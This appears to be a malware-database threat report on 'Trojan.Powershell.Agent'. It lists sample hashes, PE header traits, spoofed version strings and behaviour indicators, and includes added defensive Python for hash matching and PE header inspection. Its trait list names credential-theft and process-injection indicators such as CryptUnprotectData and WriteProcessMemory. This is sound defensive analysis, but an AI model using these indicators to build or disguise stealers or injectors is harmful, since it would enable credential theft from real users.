
Trojan.Powershell.Agent

By CagedTech in Trojans

Threat Scorecard

Popularity Rank: 2,276
Threat Level: 80 % (High)
Infected Computers: 703
First Seen: May 24, 2024
Last Seen: April 22, 2026
OS(es) Affected: Windows

Analysis Report

General information

Family Name: Trojan.Powershell.Agent
Signature status: No Signature

Known Samples

MD5: 08d5f2eb217462e79b6bd715106e6841
SHA1: 20c4947f3f7656db2b7c8afe296be29ea167f0c3
File Size: 1.45 MB, 1451008 bytes
MD5: 88cbcc7cceb5e27561a74ea558fe1764
SHA1: 7e7e7fb8de0c81f691290ca8a776e62582dcb148
File Size: 4.70 MB, 4699648 bytes
MD5: 41bfb061e5dddda9430f0c481c437acc
SHA1: 6f66173cc78af31e2945ab897ff46b3878a41e05
SHA256: 17DBEAA8C773B672DBCC60332CBED5A98E94B8156026B2001B108AFFFE30D602
File Size: 3.43 MB, 3429888 bytes
MD5: a7e2cf6fc18f25427084ee498d068483
SHA1: 8cc6d749f60c02de6d61744d3b15c8bddc404767
SHA256: FCE2E80D1FEFD53EFB1CBAB82DE9EF6E843C9BEA0074B70C83DA112FC36E8A4A
File Size: 6.98 MB, 6981632 bytes
MD5: 49dd7ae749a6238a213705cbe0a5867c
SHA1: 36f6413bd3ca800dfc66725d52421babc85b9619
SHA256: EC90F8AA83D87FC9F3FC3B991025EDB57BF2C1AAE471487D99A73BC1294813AF
File Size: 793.09 KB, 793088 bytes
MD5: daa8a39a60e9b3d0247b656c66eb9401
SHA1: 73637ac26e1840f21877a7dd33782ec7e69bfb14
SHA256: 55BE3E6CDAD379F935AEDEB24D20EB9F418C17D1E9739F872A347ECB9CF78E61
File Size: 315.90 KB, 315904 bytes
MD5: 3e72a2924cf6f11ddadc98d96d091bf1
SHA1: 0bf30a10a614207d27df8c8fc8e7b50853a52cc4
SHA256: 93A7F2326FBC959458E14647D0D752D1AB7D89C73060B956CD988F321F0DDC26
File Size: 793.09 KB, 793088 bytes
MD5: 0454c7e4196d9934192c59b55f38c0e2
SHA1: 41c1d68f0782a24e0ec47b2b203d7920bc5267da
SHA256: 3C41E8FDD8AFDAB3277668183CFF32B827DB9CDC8D79E4950322BA19C2BF5120
File Size: 1.43 MB, 1428480 bytes
MD5: 1f64428c3fe460477a4cb6a16ce87bd8
SHA1: 25df9100dccea20b7e9df01d8985dd359f11c081
SHA256: 6AB1EE6C9AC516605A541B017E57A350FF667724598B5CFEE3FDA9B2427D0AC6
File Size: 3.82 MB, 3824128 bytes
MD5: 5c7b5e617bb3fa618a852357d539d0b8
SHA1: 00f1b46df4148957f276b77b2270888c8b7a73ca
SHA256: 7595BAADD0ABDE4C20830484D87D14D1FC449230156506E28B1945DD89D8D42D
File Size: 2.52 MB, 2522624 bytes
MD5: 832008da7d08b720da63728e1cd7b807
SHA1: 819ce40e357612584bd690fc220921b9d4a8431a
SHA256: B968F3C7FD70D855EF3C7E3E4B285F6CC6D1DE18E8F73BE97D19512E30C6BB71
File Size: 2.93 MB, 2931200 bytes
MD5: 48a2936aad77328de795bb2604561f33
SHA1: 0b96826eb192ae3f6e17e84c283abf8521267837
SHA256: A7D8CB503FE3EE74D2E3DC5CB2608755F2D371E6CDF28254BD083313E3A3148A
File Size: 1.29 MB, 1292800 bytes
MD5: a104497a8a60a6eaada2ed5cfacf0a61
SHA1: 7107fd33026804fb7da9494d952a46d036f49200
SHA256: 07A9542225DBCEA7747FAE19E6FB61D6D66BD13F5A8554DB5DA2F32D4FA6CB73
File Size: 828.93 KB, 828928 bytes
MD5: ebc5d20c8580127e6b8f35f733224cb4
SHA1: b35794db405d102bc4f07d7df22b923d3717ffa7
SHA256: 0111FFB0DAB4BDEF8C8788E4CE6AD4FC071B9F7B1F3AFFB7EAD8D5DF9582F34F
File Size: 102.91 KB, 102912 bytes
MD5: 5bdca149cc76d37f7601bd59bd5a0698
SHA1: 2e56f4d8092bf9b829cd1b563f04cd55e2eb599a
SHA256: B0F2288D042583D0159AD214B37539CD0016F0A4973C3F119B8531C73D5B9D30
File Size: 890.88 KB, 890880 bytes
MD5: 78bf2e1d6172c05203a44dc1ee91a4cf
SHA1: 0e199c55c8195b8b3536317853da28ce2dbbb666
SHA256: 8C1254B01C0FCF31315D6A196BCF3AE56CA2BEB53B23ABEA39B9C0F4281D6E13
File Size: 103.42 KB, 103424 bytes
MD5: fd4a6c90472422c282333dce2acdda2c
SHA1: 28af085b96c937048d463741bc75a38dd37fdfc3
SHA256: 1CE64B0EF7130995561CCE7D149D6DE4611688EDC19016919252560FBCF046B1
File Size: 105.47 KB, 105472 bytes
MD5: 4e1de47f1ec3764fd140b81d7335fa87
SHA1: 7ce1d3e581ff3fe908b8ea9a2e5a9ef6d9781378
SHA256: 6547810C3106FD8F9F77B1E02FE3F90FF4C5A3148ED594143142E2944CDDD1CF
File Size: 107.01 KB, 107008 bytes
MD5: 09f99eedb2f4a357328769bfb7eb831a
SHA1: ada3218132154506f9959f6667800eb3e72ffcdb
SHA256: B982E7778974E6B663559A7B4B0DD7A932386D99DD0A700E6BF53E47402F955D
File Size: 14.85 KB, 14848 bytes
MD5: 0fd7a56466d976e5ad99f72fde2df901
SHA1: 075ce8c6a8190bfa4f9facbb57cdc728e7ba52ea
SHA256: 327CCB68C662D065BBC780E6C3A587EB396B2534DB1963C266A2DA5685D6B594
File Size: 828.93 KB, 828928 bytes
MD5: 44b147bdcee1b318cc600da432b1d3b7
SHA1: 872285bad4e55235da29176c198c9d8ceef642d6
SHA256: C659D53996E5942B7C4B4C8EB1C3C428694EF419D6F4E0C8BDBC48F0F42D2650
File Size: 954.37 KB, 954368 bytes
MD5: 239b0dc9d9f719f22d1f10b7732e1517
SHA1: 6ea26f667239fc5b8f97c6f9fc57f20ca9a2797b
SHA256: D686F5FEDD912CE975295D1BC4C8A8A5318BCF6DEFA1F0E47BB360FA4A6E4FEC
File Size: 2.70 MB, 2695680 bytes
MD5: 948391bb55536c46a1631eecd85a6ad3
SHA1: b294096aa12003b9a4c02a02c27250eb5b7a3193
SHA256: 1A02F8A0A30E9304317C9112223F10D846387F58A7F2ACA233372C26F6360B1C
File Size: 3.97 MB, 3971584 bytes
MD5: 035b01404ba7b407ff9f355899e3d3ab
SHA1: 614fb106c2c82033454af29c0eb6f2a0091f49fa
SHA256: 008255BAD776F0A1EA23D62DB3492D12271F6AFC79513633C1871A7F17B9675D
File Size: 5.67 MB, 5672448 bytes
MD5: 0671e7721d6fcc509b22d45d8c6fb9d1
SHA1: 607736f2744bc95f8939cc63c5fd6952a9a8c190
SHA256: 102CFE7E470D3C7F9AA27D03E2F4D8BC2FE91E1BA8CAAA880385364501BC6D4A
File Size: 7.27 MB, 7272448 bytes
MD5: 45acbc93ac5ab112dac8bbb47c36ae3f
SHA1: b93dc317de9e6f50f25d83df63c6d107591118d1
SHA256: F4844BD993221CDD68170BB2BA74F6C0CD4B235E9803D1BF5E4CD00B6772D42C
File Size: 793.09 KB, 793088 bytes
MD5: a01ccc8635289b0ba0e7e14564c89b42
SHA1: 8db8a7f12b0812611769554df5f2815dab492237
SHA256: 41F6E49552441DC6894BA0171FACD9E428C0F34B6AE3730EA5662A0DA6FE15E2
File Size: 451.58 KB, 451584 bytes
MD5: b7db4bcee6431350043c52aceb03b337
SHA1: e273ced962a291ea12ff6bc4fa78342f759eab6d
SHA256: 61EC6D5AB90328AD26044A8CEBCD1545D891E986DF2D2E34BB9DCE1716DDF0F5
File Size: 4.99 MB, 4989440 bytes
MD5: f65a8deaa4abe93369e65badab82901d
SHA1: 2bc73a4ae0eb38795c8413f5d8c176fb44d6a89b
SHA256: 4195931149D72AFBD83F4C358EAD64780F56B4D58D58249E49BB99B7BC7ABAE0
File Size: 227.84 KB, 227840 bytes
MD5: 44c0b21d2a96047a251999e90e2e9169
SHA1: 96c7077d1b99dca84e7f3b5a89e58cb608153ac0
SHA256: 979E32FDFBB01D84E881B1694C74C7D7D3CC272D7D1FBDF26A0E89DDB48331AD
File Size: 843.78 KB, 843776 bytes
MD5: 44687b5cc789a7f9c66a49fe87b3f4fe
SHA1: dd13b1b470d80d06a516e12106bfa93623d20181
SHA256: 1D68A55EC21B02E157CDF0F43FB8B2B2E519272B9039551DC7415370D3F01E34
File Size: 1.25 MB, 1249280 bytes
MD5: e20fde1ce1a5f6929978ce2d8a399ed7
SHA1: 216eede3e8b0a2ec3fa32fe2ab38dabd2bd6f3f0
SHA256: 9958A6BD9B99460FFBB8F0E1E104BD71FA2FAB48BA2FDCF845AC0C0F1C592120
File Size: 1.76 MB, 1756672 bytes
MD5: 0591317b54ca96d3cc7d15e4a0ab3bd1
SHA1: 23d7ee487ac34927af9f3c7951de68ae91d64927
SHA256: 1EEEC6B4A1855AD3B95673D692CE47E6CE660019A168154D37429836E53C5EEC
File Size: 2.13 MB, 2128896 bytes
MD5: a7095142a0eeeb90ad8d28d6b421c9e3
SHA1: 14c17e5f69e6e5074c60adec8409066514a2e434
SHA256: CE73A8A3E2C87BD9BCFBB0C51C5A1F0ED68496C587A336E00EB4D2619C49E402
File Size: 921.09 KB, 921088 bytes
MD5: e657959541358a1d8b6ce4476481e8c9
SHA1: 91b2a1efb00868895c3066b4316240a124970588
SHA256: 54E0AE616663663BE19486D8FE6568555B4BD7CDED4A20901DC99FD2EE4AE9A7
File Size: 451.07 KB, 451072 bytes
MD5: 0adada6a7d10771d9a600368c161cc2b
SHA1: f0503cac501a0c3ab8a2329da66a2173903b0e65
SHA256: 991354AB43325557A64C01E33BCD27C88B840BB74372CF7BEA291D46AE35EB23
File Size: 923.65 KB, 923648 bytes
MD5: 3cdcb0696c0ab363609e5108d453eb25
SHA1: ee563284fc8728b68a73c02c0721a91766939850
SHA256: 6F91BCE3522FC9171F3058DA1FD8097AE11FF7452E6DC188D449BF225EC2B82F
File Size: 4.01 MB, 4011008 bytes
MD5: 098f49d10512c6fecc7b3a97055a1905
SHA1: 54ec8cb895d252dee5fc009c2f9f1359f64c1caf
SHA256: 1781A39F4E8A36D04A788C2900CB152127FB12C464A34267A5473A517C46B402
File Size: 3.83 MB, 3829248 bytes
MD5: bcc1ad9e951e608562da3afa2f464fef
SHA1: 7d9f33a14e185b2b13346cbe43a1fa55a8f44307
SHA256: F14E9AB8D1AE326ABC6452749CF95A1A94D1227C7FA94B86C6F41F37810DAADB
File Size: 450.56 KB, 450560 bytes
MD5: 9aa7d7a212371c1f7da623a3efe7a2f6
SHA1: 3a74578d7c8ab3ab68efdbcb8b6e5835c0d5aa57
SHA256: DE0F7DFA69510A107B4F88AD47EDFDEE1F529B26B23633E9360852FC82D4D13F
File Size: 972.29 KB, 972288 bytes
MD5: 21e73b4ce02863b18a01a79fb672ed45
SHA1: 106f9362000efd662664631657edea43c1e98fa8
SHA256: 8BC3641C5B7FAF88AF4D8F4AF60266EDF1611F04BFF281D95E64773E22B38C1A
File Size: 514.56 KB, 514560 bytes
MD5: 164373f800f4e5cb67d9507e83168e54
SHA1: 4ea241ccfcf42c0a31d7f2dbf78fc51ae8db791e
SHA256: 0CBBD57284203749C0B7894206C38819C86902F4A407DDF1207BFB6EB636A2E2
File Size: 451.58 KB, 451584 bytes
MD5: 3893c4683616d1a82252c3388ba7b205
SHA1: f2ffb6de24332aee62d7bc0cbd40655a8800ad99
SHA256: 2230CD657793871F75C6FDF3337A128227986EA8FDC1BDA0861883439866EEF3
File Size: 345.60 KB, 345600 bytes
MD5: fb61d9b203f29f63b00ede8792906e11
SHA1: d661cd9180fefffa8ab4fd42ba8695b485944458
SHA256: EADFBEAB81C8404C48FCC2A5B05649FBD6E33C99A00914D864CD79D0E726C3F5
File Size: 856.58 KB, 856576 bytes
MD5: 5d6ce9f2595d8a5d321fb5b401d0f936
SHA1: 45db803015736162ddad19e57771f63635e09e36
SHA256: 4B648EAA723D7417569995B37325BCDB562D1AEF3A226410607855AE6B2FF86F
File Size: 2.11 MB, 2109440 bytes
MD5: 7c85e29be9e1c7d6903bfaff94f0a52a
SHA1: 691394f7848c036efed74847d359ae7fd708c5a5
SHA256: 7EF83239F6D2A1A653882DE2DF0861DDAFFBC272082F580788CD6593BD6EFE14
File Size: 3.72 MB, 3721728 bytes
MD5: 4cdecd98fcbb91a34db3d65244977ac9
SHA1: 996ee23a60e2aa1f4aee4f1d3c579ee437671775
SHA256: 316DF7BA373E28A208944CCA5F6D720746F974DFE69C32004EF1156E8F3C6AA1
File Size: 894.98 KB, 894976 bytes
MD5: d6d2677050f18db484f1c88b8e49a248
SHA1: b993fa25a382cd62212ae1a5c0600a2ce3a8891e
SHA256: 80F1B0B6ACDC093B18945C1B35EE567E8C6A6BD7D33516AD681ADBBF53FEA236
File Size: 5.68 MB, 5684224 bytes
MD5: 56af620094800984379608f6841acbe6
SHA1: 2b34eb1b0c02fe6ce336d008032bfbda245cb254
SHA256: BAA60BACCF4D73529EEA445348B71A06700A18C185688207C032772B16AAF491
File Size: 2.17 MB, 2166272 bytes
MD5: 25a271010b3c9a3209759fcb803208f1
SHA1: 99dd79bafed6cbe171c289592c9227a0b471ee4a
SHA256: F67E4EA85520CF21B063960CBF3BC0593584F11B320C7595AC9DF435126E011D
File Size: 6.09 MB, 6088704 bytes
MD5: 218693cc0b9b2d35538d2a01d0127d2b
SHA1: 6ee7ddb13eb50078e89e27d8ecd3a6f03142a757
SHA256: 097A53398B9558D613E8001154D011E07356DC2EEABE05A36A5F5AFBD00D38D5
File Size: 691.20 KB, 691200 bytes
MD5: 8ef07bae63832835b61269e959049703
SHA1: 6152b7069ad74180002a5ce599f9eb957795ea2c
SHA256: 110BFC0A4BD731D287CDAB7CBC112ACAF4F2D3293520C8028C71AD31C2A9440D
File Size: 1.40 MB, 1395200 bytes
MD5: 428a6b5802387208774b56dd16cbdec7
SHA1: 16ae5231a7e9b8a1eee7f0defa65eeb9fe6dbcf3
SHA256: 5F42F32778023746A8A5A531A380532EBBF7F09413D556654BAF000EDADA4782
File Size: 88.58 KB, 88576 bytes
MD5: 787a515cc27a8901434d245e11e9fab6
SHA1: 2f65ae4188b4a6ae19e49bc4ca250a454c9263e8
SHA256: 5BAD25AD2E07C1AE0126C9A48EF6245590BA018A7E2B8BE405ECAC53CCE858C8
File Size: 4.22 MB, 4224000 bytes
MD5: 1ea670d563ea7de167ed2122fd760cf1
SHA1: d39364c53971b68e2303e0e86ff983eda1d59461
SHA256: 52251986EE69187024D877A83720A74AA331663B3AD4F4DB1F91196E1948057C
File Size: 345.60 KB, 345600 bytes
MD5: 5658132c7ff7206cae34d1d50210a3b6
SHA1: ccebd336e082e2c15eba0b7d641290e7de12d65b
SHA256: 6860ACD93755FAFDC3C595AAF93B5F39500A870E26DE55F02464824BB88FEAD4
File Size: 2.18 MB, 2176000 bytes
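As an added example (not from the report), the following Python parses the record format above into structured IOCs, flags records that carry only MD5/SHA1 (two on this page lack a SHA256), groups samples that share an exact byte size, and matches a file's computed hashes against the set. The six records embedded in the script are copied from the list above; the `hash_bytes`/`match_sample`/`size_clusters` functions and the constructed test inputs are the editor's.

```python
"""Parse the 'Known Samples' hash records into structured IOCs and match files
against them. Added example, not part of the original report: the records
below are copied from the page, anything hashed at runtime is constructed."""
import hashlib
import re
from collections import defaultdict

# Six records copied from the list above (two lack a SHA256, as on the page).
SAMPLE_RECORDS = """\
MD5: 08d5f2eb217462e79b6bd715106e6841
SHA1: 20c4947f3f7656db2b7c8afe296be29ea167f0c3
File Size: 1.45 MB, 1451008 bytes
MD5: 88cbcc7cceb5e27561a74ea558fe1764
SHA1: 7e7e7fb8de0c81f691290ca8a776e62582dcb148
File Size: 4.70 MB, 4699648 bytes
MD5: 49dd7ae749a6238a213705cbe0a5867c
SHA1: 36f6413bd3ca800dfc66725d52421babc85b9619
SHA256: EC90F8AA83D87FC9F3FC3B991025EDB57BF2C1AAE471487D99A73BC1294813AF
File Size: 793.09 KB, 793088 bytes
MD5: 3e72a2924cf6f11ddadc98d96d091bf1
SHA1: 0bf30a10a614207d27df8c8fc8e7b50853a52cc4
SHA256: 93A7F2326FBC959458E14647D0D752D1AB7D89C73060B956CD988F321F0DDC26
File Size: 793.09 KB, 793088 bytes
MD5: 45acbc93ac5ab112dac8bbb47c36ae3f
SHA1: b93dc317de9e6f50f25d83df63c6d107591118d1
SHA256: F4844BD993221CDD68170BB2BA74F6C0CD4B235E9803D1BF5E4CD00B6772D42C
File Size: 793.09 KB, 793088 bytes
MD5: ebc5d20c8580127e6b8f35f733224cb4
SHA1: b35794db405d102bc4f07d7df22b923d3717ffa7
SHA256: 0111FFB0DAB4BDEF8C8788E4CE6AD4FC071B9F7B1F3AFFB7EAD8D5DF9582F34F
File Size: 102.91 KB, 102912 bytes
"""

_SIZE_RE = re.compile(r"File Size:\s*[\d.]+\s*[KMG]?B,\s*(\d+)\s*bytes", re.I)


def parse_samples(text):
    """Each record starts at an 'MD5:' line and ends at its 'File Size:' line."""
    samples, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.upper().startswith("MD5:"):
            current = {"md5": None, "sha1": None, "sha256": None, "size": None}
            samples.append(current)
        if current is None:
            continue
        for algo in ("md5", "sha1", "sha256"):
            if line.upper().startswith(algo.upper() + ":"):
                current[algo] = line.split(":", 1)[1].strip().lower()
        m = _SIZE_RE.match(line)
        if m:
            current["size"] = int(m.group(1))
    return samples


def hash_bytes(data):
    """Same four fields the report lists, computed for arbitrary bytes."""
    return {"md5": hashlib.md5(data).hexdigest(),
            "sha1": hashlib.sha1(data).hexdigest(),
            "sha256": hashlib.sha256(data).hexdigest(),
            "size": len(data)}


def match_sample(data, samples):
    """Return the matching record or None. SHA256 is preferred; records without
    one (two on the page) can only be matched on MD5/SHA1 and are flagged."""
    h = hash_bytes(data)
    for s in samples:
        if s["sha256"] and s["sha256"] == h["sha256"]:
            return {"record": s, "matched_on": "sha256"}
        if s["sha256"] is None and (s["sha1"] == h["sha1"] or s["md5"] == h["md5"]):
            return {"record": s,
                    "matched_on": "md5/sha1 only (collision-prone, confirm out of band)"}
    return None


def size_clusters(samples):
    """Group records by exact byte size; identical sizes under different hashes
    hint at a shared builder or packer template."""
    clusters = defaultdict(list)
    for s in samples:
        clusters[s["size"]].append(s["md5"])
    return {size: md5s for size, md5s in clusters.items() if len(md5s) > 1}


if __name__ == "__main__":
    recs = parse_samples(SAMPLE_RECORDS)
    print(len(recs), "records;", sum(r["sha256"] is None for r in recs), "without SHA256")
    print("size clusters:", size_clusters(recs))
    print("constructed bytes match:", match_sample(b"constructed benign bytes", recs))
```

Matching on MD5 or SHA1 alone is collision-prone; treat such hits as leads to confirm against a SHA256 from another source. Identical sizes (793088 bytes appears three times in the full list above) usually indicate a shared builder or packer template rather than identical files, as the differing hashes show.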

Windows Portable Executable Attributes

Attributes observed across the samples listed above (the report aggregates them per family), so mutually exclusive entries such as 32-bit and 64-bit, packed and not packed, or native and .NET describe different files rather than one:

  • File doesn't have "Rich" header
  • File doesn't have debug information
  • File doesn't have exports table
  • File doesn't have relocations information
  • File doesn't have resources
  • File doesn't have security information
  • File has been packed
  • File has exports table
  • File has TLS information
  • File is .NET application
  • File is 32-bit executable
  • File is 64-bit executable
  • File is console application (IMAGE_SUBSYSTEM_WINDOWS_CUI)
  • File is either console or GUI application
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
  • File is not packed
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)
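The list above is what a PE header inspector reports. The following Python, added as an example and not the report's tooling, reads the same flags (bitness, subsystem, EXE versus DLL, Rich header, and the export/resource/security/relocation/debug/TLS/CLR data directories) straight from the COFF and optional headers using only the standard library, and adds the byte entropy behind the HighEntropy trait listed further down. No real sample is included: `build_minimal_pe` constructs a header-only image so the script runs offline, and that name and the attribute keys are the editor's.

```python
"""Report PE header attributes (bitness, subsystem, EXE/DLL flags, which data
directories exist, Rich header, entropy) from raw bytes. Added example, not the
report's own tool; the image built below is a constructed header-only PE."""
import math
import struct

IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_DLL = 0x2000
IMAGE_SUBSYSTEM_WINDOWS_GUI = 2
IMAGE_SUBSYSTEM_WINDOWS_CUI = 3
# Data-directory slots in the optional header (PE/COFF specification).
DIR_EXPORT, DIR_RESOURCE, DIR_SECURITY, DIR_BASERELOC = 0, 2, 4, 5
DIR_DEBUG, DIR_TLS, DIR_CLR = 6, 9, 14


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0..8; packed or encrypted bodies sit near 8 ('HighEntropy')."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_attributes(data: bytes) -> dict:
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, _, _, _, _, _, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    pe32plus = magic == 0x20B
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]  # same offset in PE32/PE32+
    nrva_off = opt + (108 if pe32plus else 92)             # NumberOfRvaAndSizes
    nrva = struct.unpack_from("<I", data, nrva_off)[0]

    def has_dir(idx: int) -> bool:
        if idx >= nrva:
            return False
        va, size = struct.unpack_from("<II", data, nrva_off + 4 + 8 * idx)
        return va != 0 and size != 0

    return {
        "is_64bit": pe32plus,
        "is_dll": bool(chars & IMAGE_FILE_DLL),
        "is_executable_image": bool(chars & IMAGE_FILE_EXECUTABLE_IMAGE),
        "is_gui": subsystem == IMAGE_SUBSYSTEM_WINDOWS_GUI,
        "is_console": subsystem == IMAGE_SUBSYSTEM_WINDOWS_CUI,
        # A Rich header, when present, sits between the DOS stub and 'PE\0\0'.
        "has_rich_header": b"Rich" in data[0x40:e_lfanew],
        "has_exports": has_dir(DIR_EXPORT),
        "has_resources": has_dir(DIR_RESOURCE),
        "has_security": has_dir(DIR_SECURITY),    # Authenticode certificate table
        "has_relocations": has_dir(DIR_BASERELOC),
        "has_debug": has_dir(DIR_DEBUG),
        "has_tls": has_dir(DIR_TLS),
        "is_dotnet": has_dir(DIR_CLR),             # CLR runtime header present
        "entropy": round(shannon_entropy(data), 2),
    }


def build_minimal_pe(pe32plus=False, dll=False, subsystem=IMAGE_SUBSYSTEM_WINDOWS_CUI,
                     directories=(), rich=False) -> bytes:
    """Constructed header-only image (no sections, not loadable) for demonstration."""
    e_lfanew = 0x80
    dos = bytearray(b"MZ" + bytes(0x3E))
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    stub = bytearray(e_lfanew - 0x40)
    if rich:
        stub[0:8] = b"Rich" + bytes(4)  # marker followed by the XOR-key slot
    opt_size = 240 if pe32plus else 224
    chars = IMAGE_FILE_EXECUTABLE_IMAGE | (IMAGE_FILE_DLL if dll else 0)
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 0, 0, 0, 0, opt_size, chars)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", opt, 68, subsystem)
    nrva_off = 108 if pe32plus else 92
    struct.pack_into("<I", opt, nrva_off, 16)
    for idx in directories:
        struct.pack_into("<II", opt, nrva_off + 4 + 8 * idx, 0x1000 * (idx + 1), 0x100)
    return bytes(dos) + bytes(stub) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    img = build_minimal_pe(pe32plus=True, directories=(DIR_EXPORT, DIR_TLS, DIR_CLR))
    for key, val in pe_attributes(img).items():
        print(f"{key:22} {val}")
```

The security directory holds a file offset rather than an RVA, but for a presence check the non-zero test is the same. A "packed" verdict needs the section table and per-section entropy, which this header-only reader deliberately does not attempt.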

Windows PE Version Information

Version-resource fields collected across the samples above; each bulleted field unions the values seen, so any one sample carries at most one of them.

Name Value
Assembly Version 1.0.0.0
Comments
  • Local AI model serving with hardware acceleration
  • System tray interface for Lemonade AI Server
Company Name
  • AMD
  • AmeerXoshnaw
  • AzyhuScripts
  • Caddev
  • CB Servers
  • Project Black Ops 4
  • Tsuda Kageyu
File Description
  • AmeerXoshnaWxSteamTool
  • AzyhuScripts Library for ZeroBot
  • CB Servers Launcher
  • Joinery Tools Center
  • lemonade-router.exe
  • Lemonade Server
  • Lux Injetor
  • MinHook - The Minimalistic API Hook Library for x64/x86
  • Shield Launcher
File Version
  • 10.2.0.0
  • 9.4.1.0
  • 2.0.4
  • 2.0.1.0
  • 1.3.3.0
  • 1.2.0.78
  • 1.1.37.02
  • 1.1.2.64
  • 1.1.0.1
  • 1.0.5.48
  • 1.0.3.43
  • 1.0.0.1
  • 1.0.0.0
Info https://cbservers.xyz/
Internal Name
  • AmeerXoshnaWxSteamTool.exe
  • JTC.dll
  • launcher
  • lemonade
  • lemonade-server
  • Lux Injetor.exe
  • MinHookD
  • Shield Launcher.exe
Legal Copyright
  • Copyright (C) 2009-2017 Tsuda Kageyu. All rights reserved.
  • Copyright (C) 2024 AMD
  • Copyright (C) 2025
  • Copyright (C) 2025 AzyhuScripts. All rights reserved.
  • Copyright (C) 2026 CB Servers. All rights reserved.
  • Copyright © 2026
  • Copyright © Caddev 2022
Legal Trademarks
  • Created By BodNJenie™
  • Tsuda Kageyu
Licence GPLv3
Original Filename
  • AzyhuScriptsLib.dll
  • cb-launcher.exe
  • JTC.dll
  • lemonade-router.exe
  • lemonade-server.exe
  • Lux Injetor.exe
  • Shield Launcher.exe
  • SteamManager.exe
Product Name
  • AmeerXoshnaWxSteamTool
  • AzyhuScripts Library
  • CB Servers Launcher
  • Joinery Tools Center
  • lemonade-router.exe
  • Lemonade Server
  • Lux Injetor
  • MinHook DLL
  • Shield Launcher
Product Version
  • 10.2.0.0
  • 9.4.1.0
  • 2.0.4
  • 2.0.1.0
  • 1.3.3.0
  • 1.2.0
  • 1.1.37.02
  • 1.1.2
  • 1.1.0.1
  • 1.0.5
  • 1.0.3
  • 1.0.0.1
  • 1.0.0.0

File Traits

  • 2+ executable sections
  • AutoHK
  • CryptUnprotectData
  • dll
  • fptable
  • GetConsoleWindow
  • HighEntropy
  • imgui
  • JMC
  • No CryptProtectData
  • No Version Info
  • ntdll
  • packed
  • Pastebin
  • VirtualQueryEx
  • WriteProcessMemory
  • x64
  • x86

Block Information

Total Blocks: 6,236
Potentially Malicious Blocks: 204
Whitelisted Blocks: 4,514
Unknown Blocks: 1,518

Visual Map

(Per-block classification map of the sample in file order, one symbol per block; the page truncates it. Legend:)
0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

  • Agent.DEAB
  • Agent.FYL
  • Agent.KFP
  • ClipBanker.OC
  • CobaltStrike.RG
  • CobaltStrike.SR
  • CobaltStrike.SU
  • Coinminer.LM
  • Downloader.Agent.DTB
  • Gamehack.GDDB
  • Gamehack.SBG
  • HackKMS.TC
  • Khalesi.D
  • KillWin.H
  • Kryptik.UGC
  • Lamer.CA
  • Lamer.CB
  • Lamer.E
  • PSW.Agent.KF
  • ShellcodeRunner.TWA
  • Socelars.DD
  • St0rm.A
  • Stealer.B
  • Stealer.BC
  • Stealer.BE
  • Stealer.T
  • TGBot.JA
  • Tedy.K
  • Trojan.Agent.Gen.ABX
  • Wpakill.A

Files Modified

File Attributes
\device\namedpipe Generic Read,Write Attributes
\device\namedpipe Generic Write,Read Attributes
\device\namedpipe\dav rpc service Generic Read,Write Data,Write Attributes,Write extended,Append data
\device\namedpipe\pshost.134024922551853307.2624.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134076074978190894.7796.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134097517733282670.4668.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134101916156709262.5528.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134101916163151840.4244.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134132712154861456.7136.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134133916596935858.288.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134165533653723671.6976.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134165533660766602.4968.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134167687803066876.7204.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134167687815039093.8140.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134199906702970088.7036.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134204371861688496.6936.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\wkssvc Generic Read,Write Data,Write Attributes,Write extended,Append data
